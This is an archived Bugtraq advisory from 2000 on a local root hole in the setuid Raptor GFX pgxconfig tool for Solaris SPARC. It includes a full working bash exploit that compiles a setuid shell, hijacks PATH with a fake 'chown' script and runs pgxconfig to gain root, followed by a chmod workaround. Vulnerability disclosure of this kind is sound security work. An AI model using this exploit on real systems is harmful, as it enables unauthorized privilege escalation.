[16053] in bugtraq
Local root compromise in PGX Config Sun Sparc Solaris
daemon@ATHENA.MIT.EDU (suid@SUID.KG)
Wed Aug 2 12:34:46 2000
Message-Id: <200008021142.VAA06866@jawa.chilli.net.au>
Date: Mon, 2 Aug 0100 11:56:57 +0000
Reply-To: suid@SUID.KG
From: suid@SUID.KG
To: BUGTRAQ@SECURITYFOCUS.COM
hi guys and gals
yeah heres something i have had sitting on the shelf until the vendor sent me a
fix. they seem to have done that so here it is. drum roll...
--- Start ---
suid@suid.kg - Raptor GFX config tool local root vulnerability
Short Name: PGXCONFIG-SPARC
Software: Raptor GFXtra configuration tool - pgxconfig
URL: http://www.techsource.com
ftp://www.techsource.com/download/gfxtra.OWv101.tar.Z
Version: PGX32 (Raptor GFX) X Window System Support v2.3.1
Platforms:
Sun Solaris:
2.5.1 Sparc
2.6 Sparc
7 Sparc
8 Sparc
Type: Multiple. Lack of environment sanity checks. Insufficient
bounds checking. Insecure use of the /tmp dir.
Date: 04 July 2000
Summary:
Local users can run arbitrary commands as root.
Background:
Raptor GFX cards are PCI accelerated graphics adapters suitable
for use in Sun Sparc systems (among others). The associated driver
and configuration software is distributed for the Sun platform from
the techsource.com website.
Vulnerability:
The configuration tool associated with this product is called
pgxconfig and is installed in /usr/sbin mode 4555 by default.
Extract from pkgmap:
1 d none sbin 0775 root bin
1 s none sbin/GFXconfig=pgxconfig
1 f none sbin/pgxconfig 4555 root bin 105956 42039 934907098
With this command it is possible for any user on the system to
change the openwin configuration. The way this program does
this is using system("cp"); to copy the existing configuration
to a backup before overwriting the configuration with
a new file. Anyway, we all know that Solaris's implementation of
system() does NOT execute processes with root priviledges when the users
uid >= 100. However, this particular version of
pgxconfig does a nice setuid(0); for us. So, while we had euid = 0 from
being executed as a suid root program, we now have uid = 0 and thus
system() will execute whatever its told to, as root.
In this particular program, system is used badly and two things are
going on.
1. root privileges are not dropped
2. the environment is not sanitised
without source I cant show you exactly whats going on in there but the
result is obviously insecure.
Its worth noting here (and demonstrating in the exploit) that the
use of system("cp /whatever /wherever"); isn't the only system()
call worth exploiting. I've used the easiest one in my exploit
below.
Other problems noted but not investigated were multiple command
line options lacking proper bounds checking and predictable temp
file creation. It would be a good idea for the vendor to
perform a complete audit on this product.
Exploit:
---------------------------CUT---------------------------
#!/usr/local/bin/bash
# TechSource Raptor GFX configurator root exploit
# suid@suid.kg
# unfortunately a compiler must be installed to use this example
# exploit. however there's a million ways around this you know
# on my system , gcc isnt in my path
PATH=$PATH:/usr/local/bin
# build a little prog nothing new here folks
echo '#include<stdio.h>' > ./x.c
echo 'int main(void) { setuid(0); setgid(0); execl
("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
gcc x.c -o foobar
rm -f ./x.c
# build a substitute chown command. i much prefer this over
# regular chown
echo "#!/bin/sh" > chown
echo "/usr/bin/chown root ./foobar" >> chown
echo "/usr/bin/chmod 4755 ./foobar" >> chown
chmod 0755 chown
# oooh look its the magical fairy path variable
export PATH=.:$PATH
# heres one way to skin a cat
# (theres more, some need valid devices. excercise for the readers)
/usr/sbin/pgxconfig -i
rm -f chown
./foobar
----------------------------END--------------------------
Fix:
No source, no fix. A workaround is:
Disable /usr/sbin/pgxconfig or /usr/sbin/GFXconfig (or both)
or at least remove the suid bit.
# chmod 0 /usr/sbin/pgxconfig
or
# chmod 0511 /usr/sbin/pgxconfig
Until your vendor can issue a fix.
Greets:
duke - r0x j00r s0x
cr - m3mb3r 0f t4sk f0rc3 el1t3-p0rn-k1ngz
yowie - elite greet wh0re
ratcorpse + par - congrats dudes
anyone i met at defcon 8 / black hat briefings
Thumbs Down:
Network Solutions - assholes
http://www.suid.edu/advisories/012.txt
--- EOF ---
